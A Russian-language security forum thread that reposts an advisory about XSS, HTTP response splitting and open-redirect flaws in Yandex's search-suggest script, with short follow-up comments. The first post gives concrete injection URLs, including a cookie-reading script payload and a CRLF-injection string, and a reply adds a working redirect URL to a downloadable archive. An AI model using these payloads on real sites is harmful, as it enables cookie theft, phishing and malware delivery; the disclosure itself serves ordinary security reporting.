Показано с 1 по 4 из 4.

В сервисе поисковых подсказок Яндекса обнаружены множественные уязвимости

  1. #1
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ALEX(XX)
    Регистрация
    31.03.2005
    Адрес
    Чернигов
    Сообщений
    10,777
    Вес репутации
    3708

    В сервисе поисковых подсказок Яндекса обнаружены множественные уязвимости

    * Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.

    Приложение: /suggest-ya.cgi

    GET-переменные: part

    Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=<script>alert(document.cookie)</script>

    * Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)

    Приложение: /suggest-ya.cgi

    GET-переменные: ct

    Пример: http://suggest.yandex.ru/suggest-ya....art=fuzzing.ru (устанавливает cookie от имени сервера)

    Простые примеры применения, не говоря уже о сложных вариантах.

    * Универсальный редиректор - http://suggest.yandex.ru/suggest-ya....art=fuzzing.ru

    * Использование уязвимостей других приложений или распостранение вирусов (подмена content-type)

    Можно предложить, к примеру, скачать с Яндекса великолепную программу Firefox с поиском Яндекса

    http://suggest.yandex.ru/suggest-ya....art=fuzzing.ru

    Или любое другое приложение или мультимедиа-файл. К примеру.

    http://suggest.yandex.ru/suggest-ya....art=fuzzing.ru

    * Подмена содержимого страницы - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html;charset=utf-8%0d%0a%0d%0a%D0%91%D0%BB%D0%BE%D0%B3%20fuzzing.ru <script>//&part=fuzzing.ru

    securitylab.ru
    Left home for a few days and look what happens...

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    External Specialist Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для priv8v
    Регистрация
    26.06.2008
    Сообщений
    1,373
    Вес репутации
    1240
    подобное находят достаточно часто на всех крупных сервисах, особенно тогда, когда они у себя запускают какой-нибудь новый сервис

  4. #3
    Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    27.08.2006
    Сообщений
    2,453
    Вес репутации
    0
    Цитата Сообщение от priv8v Посмотреть сообщение
    подобное находят достаточно часто на всех крупных сервисах, особенно тогда, когда они у себя запускают какой-нибудь новый сервис
    Ещё веселее, когда у вас на компе установлен Toolbar из этих сервисов...

    Paul

  5. #4
    External Specialist Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для priv8v
    Регистрация
    26.06.2008
    Сообщений
    1,373
    Вес репутации
    1240
    если уж говорить о редиректе, то тут для фишеров просто рай: на любом таком сервисе таких лазеек - куча. тут даже секьюритилаб читать не надо - все можно найти самому.

    вот редиректор, к примеру на файл или на страницу (нашел только что - полазал там и нашел еще фигню такую. подобной фигни найти можно кучу просто на любом сервисе мыльном):

    Код:
    http://www.yandex.ru/redir?dtype=test&pid=000&cid=000&url=http://www.virusinfo.info/soft/knlps04.rar
    Зла просто не хватает на криворуких кодеров/админов

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01480 seconds with 16 queries